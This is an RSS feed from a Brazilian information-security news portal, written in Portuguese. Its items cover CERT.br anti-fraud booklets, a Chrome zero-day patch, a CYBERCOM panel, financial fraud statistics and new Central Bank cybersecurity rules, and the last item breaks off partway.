<?xml version="1.0" encoding="UTF-8" standalone="no"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" version="2.0">

<channel>
	<title>SegInfo – Portal, Podcast e Evento sobre Segurança da Informação</title>
	<atom:link href="https://seginfo.com.br/feed/" rel="self" type="application/rss+xml"/>
	<link>https://seginfo.com.br/</link>
	<description>Notícias, Artigos e Inovação em Tecnologia e Segurança da Informação</description>
	<lastBuildDate>Thu, 02 Apr 2026 21:05:33 +0000</lastBuildDate>
	<language>pt-BR</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	

<image>
	<url>https://seginfo.com.br/wp-content/uploads/2021/02/cropped-seginfo-icon-45x45.jpg?crop=1</url>
	<title>SegInfo – Portal, Podcast e Evento sobre Segurança da Informação</title>
	<link>https://seginfo.com.br/</link>
	<width>32</width>
	<height>32</height>
</image> 
<site xmlns="com-wordpress:feed-additions:1">60564127</site>	<item>
		<title>CERT.br lança novos fascículos da Cartilha de Segurança com foco na prevenção de golpes e fraudes online</title>
		<link>https://seginfo.com.br/2026/04/02/cert-br-lanca-novos-fasciculos-da-cartilha-de-seguranca-com-foco-na-prevencao-de-golpes-e-fraudes-online/</link>
		
		
		<pubDate>Thu, 02 Apr 2026 21:05:31 +0000</pubDate>
				<category><![CDATA[Artigos]]></category>
		<category><![CDATA[Notícia]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=74822</guid>

					<description><![CDATA[<p>O Centro de Estudos, Resposta e Tratamento de Incidentes de Segurança no Brasil (CERT.br) anunciou o lançamento de novos fascículos da Cartilha de Segurança para Internet, com foco na prevenção de golpes e fraudes no ambiente digital. As publicações, intituladas “Golpes: Não se Deixe Enganar” e “Golpes: Evite Fraudes”, apresentam, de forma didática, as principais&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2026/04/02/cert-br-lanca-novos-fasciculos-da-cartilha-de-seguranca-com-foco-na-prevencao-de-golpes-e-fraudes-online/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2026/04/02/cert-br-lanca-novos-fasciculos-da-cartilha-de-seguranca-com-foco-na-prevencao-de-golpes-e-fraudes-online/">CERT.br lança novos fascículos da Cartilha de Segurança com foco na prevenção de golpes e fraudes online</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img fetchpriority="high" decoding="async" width="1024" height="438" src="https://seginfo.com.br/wp-content/uploads/2026/04/AdobeStock_676584549-1024x438.jpeg" alt="" class="wp-image-74829" style="width:740px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2026/04/AdobeStock_676584549-1024x438.jpeg 1024w, https://seginfo.com.br/wp-content/uploads/2026/04/AdobeStock_676584549-300x128.jpeg 300w, https://seginfo.com.br/wp-content/uploads/2026/04/AdobeStock_676584549-150x64.jpeg 150w, https://seginfo.com.br/wp-content/uploads/2026/04/AdobeStock_676584549-768x328.jpeg 768w, https://seginfo.com.br/wp-content/uploads/2026/04/AdobeStock_676584549-1536x656.jpeg 1536w, https://seginfo.com.br/wp-content/uploads/2026/04/AdobeStock_676584549-2048x875.jpeg 2048w, https://seginfo.com.br/wp-content/uploads/2026/04/AdobeStock_676584549-1170x500.jpeg 1170w, https://seginfo.com.br/wp-content/uploads/2026/04/AdobeStock_676584549-1123x480.jpeg 1123w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">O Centro de Estudos, Resposta e Tratamento de Incidentes de Segurança no Brasil (CERT.br) anunciou o lançamento de novos fascículos da Cartilha de Segurança para Internet, com foco na prevenção de golpes e fraudes no ambiente digital.</p>



<p class="wp-block-paragraph">As publicações, intituladas <em>“Golpes: Não se Deixe Enganar”</em> e <em>“Golpes: Evite Fraudes”</em>, apresentam, de forma didática, as principais estratégias utilizadas por criminosos, além de orientações práticas para que usuários possam se proteger.</p>



<p class="wp-block-paragraph">Os materiais destacam o papel central da engenharia social nos ataques atuais, explorando emoções como medo, urgência e ganância para induzir vítimas a tomar decisões precipitadas. Esse tipo de abordagem está diretamente relacionado a golpes como phishing e fraudes digitais, amplamente explorados em cenários reais.</p>



<p class="wp-block-paragraph">Além disso, o CERT.br alerta para o uso crescente de tecnologias como inteligência artificial e deepfakes, que tornam os golpes mais sofisticados e difíceis de identificar — um cenário que reforça a necessidade de educação contínua em segurança digital.</p>



<p class="wp-block-paragraph">O primeiro fascículo busca desenvolver o senso crítico dos usuários, incentivando uma postura baseada em três princípios: “Desconfie. Informe-se. Verifique”. Já o segundo reúne medidas práticas de prevenção, com foco na proteção de contas, transações financeiras e identidade digital.</p>



<p class="wp-block-paragraph">Entre as recomendações, estão a verificação de informações por canais oficiais e a atenção redobrada a mensagens suspeitas — mesmo quando aparentam vir de contatos conhecidos. O material também chama atenção para golpes financeiros cada vez mais comuns, como fraudes envolvendo Pix e uso indevido de dados pessoais.</p>



<p class="wp-block-paragraph">Além dos fascículos, o CERT.br ampliou a iniciativa “Cidadão na Rede”, com novos vídeos educativos que apresentam sinais de golpes online e boas práticas para um uso mais seguro da internet.</p>



<p class="wp-block-paragraph">A Cartilha de Segurança para Internet é uma referência consolidada no Brasil e reforça um ponto central: tecnologia sozinha não resolve o problema — a conscientização do usuário é uma camada crítica de defesa.</p>



<h2 id="h-conheca-o-blog-clavis-e-aprofunde-seu-conhecimento-contra-golpes-atraves-de-conteudos-praticos-e-atualizados" class="wp-block-heading">Conheça o Blog Clavis, e aprofunde seu conhecimento contra golpes, através de  conteúdos práticos e atualizados</h2>



<p class="wp-block-paragraph">Para complementar as orientações apresentadas pelo CERT.br, o <strong><a href="https://clavis.com.br/blog/" target="_blank" rel="noreferrer noopener">blog da Clavis</a></strong> reúne conteúdos que aprofundam boas práticas de segurança e ajudam a reduzir riscos no dia a dia digital — conectando teoria e aplicação prática em cenários reais.</p>



<p class="wp-block-paragraph">Entre os temas abordados, destacam-se:</p>



<ul class="wp-block-list">
<li>• <strong><a href="https://clavis.com.br/blog/fraudes-em-celular-e-web/" target="_blank" rel="noreferrer noopener">Dicas práticas para identificar golpes e tentativas de phishing em diferentes canais</a></strong>;<br></li>



<li>• <strong><a href="https://clavis.com.br/blog/violacoes-de-privacidade-na-internet/" target="_blank" rel="noreferrer noopener">Boas práticas para proteção de dados pessoais e prevenção de fraudes</a></strong>;<br></li>



<li>• <strong><a href="https://clavis.com.br/blog/psicologia-da-engenharia-social/" target="_blank" rel="noreferrer noopener">Estratégias para entender e mitigar ataques baseados em engenharia social</a></strong>;<br></li>



<li>• <strong><a href="https://clavis.com.br/blog/iam-o-que-e-e-como-funciona-a-gestao-de-identidade-e-acesso/" target="_blank" rel="noreferrer noopener">Recomendações para fortalecer a segurança de acessos, identidades e contas digitais</a></strong>.</li>
</ul>



<p class="wp-block-paragraph">Acesse o <a href="https://clavis.com.br/blog/" target="_blank" rel="noreferrer noopener"><strong>blog da Clavis</strong></a> e confira conteúdos completos para fortalecer sua segurança digital.</p>



<p class="wp-block-paragraph">Para saber mais, clique <strong><a href="https://www.cgi.br/noticia/releases/cert-br-lanca-novos-fasciculos-da-cartilha-de-seguranca-para-internet-com-foco-na-prevencao-de-golpes-e-fraudes-i-online-i/" target="_blank" rel="noreferrer noopener nofollow">aqui</a></strong>.</p>
<p>The post <a href="https://seginfo.com.br/2026/04/02/cert-br-lanca-novos-fasciculos-da-cartilha-de-seguranca-com-foco-na-prevencao-de-golpes-e-fraudes-online/">CERT.br lança novos fascículos da Cartilha de Segurança com foco na prevenção de golpes e fraudes online</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">74822</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Zero-day explorado está entre 21 vulnerabilidades corrigidas no Chrome</title>
		<link>https://seginfo.com.br/2026/04/01/zero-day-explorado-esta-entre-21-vulnerabilidades-corrigidas-no-chrome/</link>
		
		
		<pubDate>Wed, 01 Apr 2026 16:41:51 +0000</pubDate>
				<category><![CDATA[Notícia]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=74807</guid>

					<description><![CDATA[<p>O Google anunciou a atualização do Chrome 146, que corrige 21 vulnerabilidades de segurança, incluindo uma falha zero-day já explorada ativamente em ataques reais. De acordo com o advisory divulgado pela empresa, a nova versão do navegador corrige 19 vulnerabilidades classificadas como de alta severidade e duas de severidade média. A falha explorada está identificada&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2026/04/01/zero-day-explorado-esta-entre-21-vulnerabilidades-corrigidas-no-chrome/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2026/04/01/zero-day-explorado-esta-entre-21-vulnerabilidades-corrigidas-no-chrome/">Zero-day explorado está entre 21 vulnerabilidades corrigidas no Chrome</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img decoding="async" width="1024" height="683" src="https://seginfo.com.br/wp-content/uploads/2026/04/AdobeStock_1568635623-1024x683.jpeg" alt="" class="wp-image-74811" style="aspect-ratio:1.4992888417882142;width:740px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2026/04/AdobeStock_1568635623-1024x683.jpeg 1024w, https://seginfo.com.br/wp-content/uploads/2026/04/AdobeStock_1568635623-300x200.jpeg 300w, https://seginfo.com.br/wp-content/uploads/2026/04/AdobeStock_1568635623-150x100.jpeg 150w, https://seginfo.com.br/wp-content/uploads/2026/04/AdobeStock_1568635623-768x512.jpeg 768w, https://seginfo.com.br/wp-content/uploads/2026/04/AdobeStock_1568635623-1536x1024.jpeg 1536w, https://seginfo.com.br/wp-content/uploads/2026/04/AdobeStock_1568635623-2048x1365.jpeg 2048w, https://seginfo.com.br/wp-content/uploads/2026/04/AdobeStock_1568635623-1170x780.jpeg 1170w, https://seginfo.com.br/wp-content/uploads/2026/04/AdobeStock_1568635623-720x480.jpeg 720w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">O Google anunciou a atualização do Chrome 146, que corrige 21 vulnerabilidades de segurança, incluindo uma falha zero-day já explorada ativamente em ataques reais.</p>



<p class="wp-block-paragraph">De acordo com o advisory divulgado pela empresa, a nova versão do navegador corrige 19 vulnerabilidades classificadas como de alta severidade e duas de severidade média.</p>



<p class="wp-block-paragraph">A falha explorada está identificada como <strong><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-5281" target="_blank" rel="noreferrer noopener nofollow">CVE-2026-5281</a></strong> e foi descrita como um problema do tipo <em>use-after-free</em> no Dawn, camada gráfica do Chrome.</p>



<p class="wp-block-paragraph">Segundo o Google, já existem evidências de exploração ativa dessa vulnerabilidade:<br>“Google is aware that an exploit for CVE-2026-5281 exists in the wild”.</p>



<p class="wp-block-paragraph">A empresa não divulgou detalhes sobre os ataques que exploram a CVE-2026-5281. No entanto, vulnerabilidades desse tipo são frequentemente utilizadas em cenários de <em>sandbox escape</em> ou <em>arbitrary code execution</em>, permitindo que atacantes comprometam sistemas de forma mais ampla.</p>



<p class="wp-block-paragraph">O zero-day foi reportado por um pesquisador anônimo, que também foi creditado por outra vulnerabilidade de alta severidade — <strong><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-5284" target="_blank" rel="noreferrer noopener nofollow">CVE-2026-5284</a></strong>, também classificada como <em>use-after-free</em> no Dawn. Até o momento, não há indícios de exploração ativa dessa segunda falha.</p>



<p class="wp-block-paragraph">Este é o quarto zero-day corrigido no Chrome em 2026, após as vulnerabilidades <strong><a href="https://nvd.nist.gov/vuln/detail/cve-2026-2441" target="_blank" rel="noreferrer noopener nofollow">CVE-2026-2441</a></strong>, <strong><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-3909" target="_blank" rel="noreferrer noopener nofollow">CVE-2026-3909</a></strong> e <strong><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-3910" target="_blank" rel="noreferrer noopener nofollow">CVE-2026-3910</a></strong>.</p>



<p class="wp-block-paragraph">Todas as 21 vulnerabilidades corrigidas nesta atualização foram reportadas ao Google ao longo do mês de março. A empresa ainda não definiu os valores de <em>bug bounty</em> que serão pagos aos pesquisadores responsáveis pelas descobertas.</p>



<p class="wp-block-paragraph">Para saber mais, clique <strong><a href="https://www.securityweek.com/exploited-zero-day-among-21-vulnerabilities-patched-in-chrome/" target="_blank" rel="noreferrer noopener nofollow">aqui</a></strong>.</p>
<p>The post <a href="https://seginfo.com.br/2026/04/01/zero-day-explorado-esta-entre-21-vulnerabilidades-corrigidas-no-chrome/">Zero-day explorado está entre 21 vulnerabilidades corrigidas no Chrome</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">74807</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Diretores da NSA destacam papel da cibersegurança corporativa na segurança nacional</title>
		<link>https://seginfo.com.br/2026/03/27/diretores-da-nsa-destacam-papel-da-ciberseguranca-corporativa-na-seguranca-nacional/</link>
		
		
		<pubDate>Fri, 27 Mar 2026 20:58:09 +0000</pubDate>
				<category><![CDATA[Notícia]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=74758</guid>

					<description><![CDATA[<p>Durante a RSA Conference 2026, líderes do U.S. Cyber Command (CYBERCOM), ligado à National Security Agency (NSA), chamaram atenção para a importância crescente da cibersegurança no setor privado como elemento central da segurança nacional. O painel reuniu os quatro últimos diretores do comando para discutir como os conflitos cibernéticos têm evoluído e impactado governos e&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2026/03/27/diretores-da-nsa-destacam-papel-da-ciberseguranca-corporativa-na-seguranca-nacional/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2026/03/27/diretores-da-nsa-destacam-papel-da-ciberseguranca-corporativa-na-seguranca-nacional/">Diretores da NSA destacam papel da cibersegurança corporativa na segurança nacional</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img decoding="async" width="1024" height="574" src="https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1872664411-1024x574.jpeg" alt="" class="wp-image-74768" style="width:780px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1872664411-1024x574.jpeg 1024w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1872664411-300x168.jpeg 300w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1872664411-150x84.jpeg 150w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1872664411-768x430.jpeg 768w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1872664411-1536x861.jpeg 1536w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1872664411-2048x1148.jpeg 2048w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1872664411-1170x656.jpeg 1170w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1872664411-1827x1024.jpeg 1827w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1872664411-856x480.jpeg 856w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">Durante a RSA Conference 2026, líderes do <em>U.S. Cyber Command </em>(CYBERCOM), ligado à National Security Agency (NSA), chamaram atenção para a importância crescente da cibersegurança no setor privado como elemento central da segurança nacional. O painel reuniu os quatro últimos diretores do comando para discutir como os conflitos cibernéticos têm evoluído e impactado governos e empresas.</p>



<p class="wp-block-paragraph">O debate abordou principalmente os efeitos da ciberguerra sobre estruturas econômicas, políticas e sociais. Segundo os especialistas, ataques recentes têm priorizado serviços essenciais — como energia, abastecimento de água, sistemas financeiros e transporte — com potencial de gerar interrupções significativas e efeitos em cadeia.</p>



<p class="wp-block-paragraph">Na avaliação dos ex-diretores, todos militares reformados dos Estados Unidos, adversários geopolíticos têm direcionado suas ações para comprometer operações críticas, explorando fragilidades que podem desestabilizar países sem a necessidade de confrontos tradicionais. Esse cenário pressiona governos a acelerar a evolução de suas estratégias de defesa digital.</p>



<p class="wp-block-paragraph">Nos Estados Unidos, onde cerca de 85% da infraestrutura crítica é operada por empresas privadas, o risco ganha uma dimensão adicional. Ataques a organizações podem provocar impactos comparáveis aos sofridos por instituições governamentais, evidenciando uma mudança no foco das ameaças cibernéticas.</p>



<p class="wp-block-paragraph">O General <strong>Keith Alexander</strong>, primeiro diretor do CYBERCOM, relembrou que a criação do comando, em 2008, foi impulsionada pela identificação de malwares em redes classificadas do governo. Segundo ele, a crescente dispersão de dados e sistemas tornou a proteção ainda mais desafiadora ao longo dos anos.</p>



<h3 id="h-cooperacao-entre-governo-e-empresas" class="wp-block-heading">Cooperação entre governo e empresas</h3>



<p class="wp-block-paragraph">Os participantes destacaram que a atuação governamental isolada não é suficiente para lidar com o atual nível de risco. A maturidade em segurança da informação por parte das empresas e a cooperação com o setor público são consideradas fundamentais para fortalecer a resiliência cibernética.</p>



<p class="wp-block-paragraph">Para o Almirante <strong>Mike Rogers</strong>, segundo diretor do CYBERCOM, o setor privado já reconhece a necessidade de investir em segurança para garantir a continuidade das operações. No entanto, ele ressalta que os governos precisam avançar no tratamento do tema, indo além de diretrizes e boas práticas, com abordagens mais estruturadas e, possivelmente, regulatórias.</p>



<p class="wp-block-paragraph">O almirante também comparou os efeitos de ataques cibernéticos a ações militares convencionais, destacando que o impacto pode ser equivalente em determinados cenários — o que exige uma resposta proporcional em termos de prioridade e preparo.</p>



<h3 id="h-experiencia-operacional-e-novos-desafios" class="wp-block-heading">Experiência operacional e novos desafios</h3>



<p class="wp-block-paragraph">Outro ponto enfatizado foi o valor da experiência acumulada em operações cibernéticas ofensivas. Segundo o General <strong>Paul Nakasone</strong>, atividades conduzidas em regiões como Oriente Médio contribuíram para o desenvolvimento de conhecimento estratégico sobre ameaças digitais e formas de mitigação, especialmente diante de países como Rússia e China.</p>



<p class="wp-block-paragraph">Além disso, os diretores alertaram para o papel das tecnologias emergentes, como a inteligência artificial, no cenário de segurança. O uso dessas ferramentas tende a ampliar tanto capacidades defensivas quanto ofensivas, exigindo atenção redobrada das organizações.</p>



<p class="wp-block-paragraph">Para o General <strong>Tim Haugh</strong>, atual diretor do CYBERCOM, o desafio agora é garantir que a inovação tecnológica seja utilizada de forma segura, preservando a integridade de sistemas críticos e a estabilidade da sociedade em um ambiente cada vez mais complexo.</p>



<p class="wp-block-paragraph">Para saber mais, clique <strong><a href="https://securityleaders.com.br/diretores-da-nsa-defendem-cyber-corporativa-como-pilar-da-seguranca-nacional/" target="_blank" rel="noreferrer noopener nofollow">aqui</a></strong>.</p>
<p>The post <a href="https://seginfo.com.br/2026/03/27/diretores-da-nsa-destacam-papel-da-ciberseguranca-corporativa-na-seguranca-nacional/">Diretores da NSA destacam papel da cibersegurança corporativa na segurança nacional</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">74758</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Sistema financeiro registra 12 milhões de indícios de fraude em 2025</title>
		<link>https://seginfo.com.br/2026/03/23/sistema-financeiro-registra-12-milhoes-de-indicios-de-fraude-em-2025/</link>
		
		
		<pubDate>Mon, 23 Mar 2026 17:59:07 +0000</pubDate>
				<category><![CDATA[Notícia]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=74718</guid>

					<description><![CDATA[<p>O sistema financeiro brasileiro registrou 12 milhões de indícios de fraude ao longo de 2025, segundo levantamento da Quod com base em dados do Registro Unificado de Fraudes (Rufra). O número representa um crescimento expressivo em relação ao ano anterior e reforça a escalada das fraudes no país. Um dos principais fatores para esse aumento&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2026/03/23/sistema-financeiro-registra-12-milhoes-de-indicios-de-fraude-em-2025/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2026/03/23/sistema-financeiro-registra-12-milhoes-de-indicios-de-fraude-em-2025/">Sistema financeiro registra 12 milhões de indícios de fraude em 2025</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="572" src="https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1867678099-1024x572.jpeg" alt="" class="wp-image-74721" style="width:744px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1867678099-1024x572.jpeg 1024w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1867678099-300x167.jpeg 300w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1867678099-150x84.jpeg 150w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1867678099-768x429.jpeg 768w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1867678099-1536x857.jpeg 1536w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1867678099-2048x1143.jpeg 2048w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1867678099-1170x653.jpeg 1170w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1867678099-1835x1024.jpeg 1835w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1867678099-860x480.jpeg 860w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">O sistema financeiro brasileiro registrou <strong>12 milhões de indícios de fraude ao longo de 2025</strong>, segundo levantamento da Quod com base em dados do Registro Unificado de Fraudes (Rufra). O número representa um crescimento expressivo em relação ao ano anterior e reforça a escalada das fraudes no país.</p>



<p class="wp-block-paragraph">Um dos principais fatores para esse aumento está na ampliação do compartilhamento de informações entre instituições financeiras, impulsionado por exigências regulatórias mais recentes. Com maior adesão ao sistema e aumento da visibilidade, o volume de registros cresce, ao mesmo tempo em que evidencia a dimensão real do problema.</p>



<p class="wp-block-paragraph">Os dados também mostram a recorrência das ocorrências: milhões de consumidores foram alvo de tentativas repetidas, indicando que os fraudadores operam de forma contínua e direcionada. Além disso, a concentração de casos em faixas etárias mais jovens reforça a necessidade de estratégias específicas de prevenção e conscientização.</p>



<p class="wp-block-paragraph">Esse cenário reflete uma combinação de fatores. De um lado, há o avanço dos mecanismos de detecção e monitoramento, com uso crescente de inteligência analítica e integração de bases de dados. De outro, observa-se a evolução das táticas utilizadas por criminosos, que exploram credenciais vazadas, engenharia social e brechas em processos digitais.</p>



<p class="wp-block-paragraph">Para as instituições, o recado é claro: a fraude deixou de ser um evento isolado e passou a operar em escala industrial. Isso exige uma abordagem mais estruturada, baseada em inteligência, correlação de eventos e resposta contínua.</p>



<p class="wp-block-paragraph">Medidas como autenticação multifator, monitoramento transacional em tempo real, validação robusta de identidade e integração com bases externas de fraude tornam-se cada vez mais essenciais. Além disso, a capacidade de compartilhar informações de forma segura entre organizações passa a ser um diferencial crítico na redução de riscos.</p>



<p class="wp-block-paragraph">O aumento dos indícios de fraude não representa apenas um crescimento das tentativas, mas também uma mudança no nível de maturidade do ecossistema financeiro — que passa a enxergar, com mais clareza, a extensão e a complexidade das ameaças.</p>



<p class="wp-block-paragraph">Para saber mais, clique <a href="https://valor.globo.com/financas/noticia/2026/03/19/sistema-financeiro-registra-12-milhes-de-indcios-de-fraude-em-2025-aponta-quod.ghtml" target="_blank" rel="noreferrer noopener nofollow"><strong>aqui</strong></a>.</p>
<p>The post <a href="https://seginfo.com.br/2026/03/23/sistema-financeiro-registra-12-milhoes-de-indicios-de-fraude-em-2025/">Sistema financeiro registra 12 milhões de indícios de fraude em 2025</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">74718</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Novas exigências do Banco Central para segurança cibernética já estão em vigor e ampliam responsabilidades no setor financeiro</title>
		<link>https://seginfo.com.br/2026/03/20/novas-exigencias-do-banco-central-para-seguranca-cibernetica-ja-estao-em-vigor-e-ampliam-responsabilidades-no-setor-financeiro/</link>
		
		
		<pubDate>Fri, 20 Mar 2026 22:14:51 +0000</pubDate>
				<category><![CDATA[Notícia]]></category>
		<category><![CDATA[BACEN]]></category>
		<category><![CDATA[Banco Central do Brasil]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=74694</guid>

					<description><![CDATA[<p>As novas regras do Banco Central para segurança cibernética já estão em vigor e trazem mudanças relevantes para instituições financeiras, especialmente no que diz respeito à governança, controle de riscos e proteção de ambientes críticos. As exigências estão formalizadas na Resolução BCB nº 538/2025 e na Resolução CMN nº 5.274/2025, que reforçam a necessidade de&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2026/03/20/novas-exigencias-do-banco-central-para-seguranca-cibernetica-ja-estao-em-vigor-e-ampliam-responsabilidades-no-setor-financeiro/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2026/03/20/novas-exigencias-do-banco-central-para-seguranca-cibernetica-ja-estao-em-vigor-e-ampliam-responsabilidades-no-setor-financeiro/">Novas exigências do Banco Central para segurança cibernética já estão em vigor e ampliam responsabilidades no setor financeiro</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="683" src="https://seginfo.com.br/wp-content/uploads/2026/03/ChatGPT-Image-20-de-mar.-de-2026-19_11_46-1024x683.png" alt="" class="wp-image-74697" srcset="https://seginfo.com.br/wp-content/uploads/2026/03/ChatGPT-Image-20-de-mar.-de-2026-19_11_46-1024x683.png 1024w, https://seginfo.com.br/wp-content/uploads/2026/03/ChatGPT-Image-20-de-mar.-de-2026-19_11_46-300x200.png 300w, https://seginfo.com.br/wp-content/uploads/2026/03/ChatGPT-Image-20-de-mar.-de-2026-19_11_46-150x100.png 150w, https://seginfo.com.br/wp-content/uploads/2026/03/ChatGPT-Image-20-de-mar.-de-2026-19_11_46-768x512.png 768w, https://seginfo.com.br/wp-content/uploads/2026/03/ChatGPT-Image-20-de-mar.-de-2026-19_11_46-1170x780.png 1170w, https://seginfo.com.br/wp-content/uploads/2026/03/ChatGPT-Image-20-de-mar.-de-2026-19_11_46-720x480.png 720w, https://seginfo.com.br/wp-content/uploads/2026/03/ChatGPT-Image-20-de-mar.-de-2026-19_11_46.png 1536w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p class="wp-block-paragraph">As novas regras do Banco Central para segurança cibernética já estão em vigor e trazem mudanças relevantes para instituições financeiras, especialmente no que diz respeito à <strong>governança, controle de riscos e proteção de ambientes críticos</strong>.</p>



<p class="wp-block-paragraph">As exigências estão formalizadas na <a href="https://www.bcb.gov.br/estabilidadefinanceira/exibenormativo?tipo=Resolu%C3%A7%C3%A3o%20BCB&amp;numero=538"><strong>Resolução BCB nº 538/2025</strong></a> e na <a href="https://www.bcb.gov.br/estabilidadefinanceira/exibenormativo?tipo=Resolu%C3%A7%C3%A3o%20CMN&amp;numero=5274"><strong>Resolução CMN nº 5.274/2025</strong></a>, que reforçam a necessidade de uma abordagem mais estruturada, em que a segurança deixa de ser apenas técnica e passa a exigir <strong>processos contínuos, evidências e rastreabilidade</strong>.</p>



<h2 id="h-seguranca-passa-a-ser-tratada-como-processo-continuo" class="wp-block-heading"><strong>Segurança passa a ser tratada como processo contínuo</strong></h2>



<p class="wp-block-paragraph">Com as novas exigências, as instituições precisam garantir não apenas a implementação de controles, mas também sua <strong>manutenção, monitoramento e comprovação de efetividade</strong>.</p>



<p class="wp-block-paragraph">Isso inclui práticas como:</p>



<ul class="wp-block-list">
<li>Gestão contínua de vulnerabilidades;</li>



<li>Registro e retenção de logs;</li>



<li>Controle de acessos e revisões periódicas;</li>



<li>Uso de autenticação multifator;</li>



<li>Proteção de dados com criptografia;</li>



<li>Monitoramento de ameaças.</li>
</ul>



<p class="wp-block-paragraph">A exigência passa a ser menos sobre “ter controles” e mais sobre <strong>demonstrar que eles funcionam ao longo do tempo</strong>.</p>



<h2 id="h-maior-atencao-a-terceiros-e-desenvolvimento-de-sistemas" class="wp-block-heading"><strong>Maior atenção a terceiros e desenvolvimento de sistemas</strong></h2>



<p class="wp-block-paragraph">Outro ponto reforçado é a responsabilidade sobre sistemas desenvolvidos internamente e por terceiros. As instituições devem garantir requisitos de segurança em todo o ciclo de vida das aplicações, incluindo integrações e uso de novas tecnologias.</p>



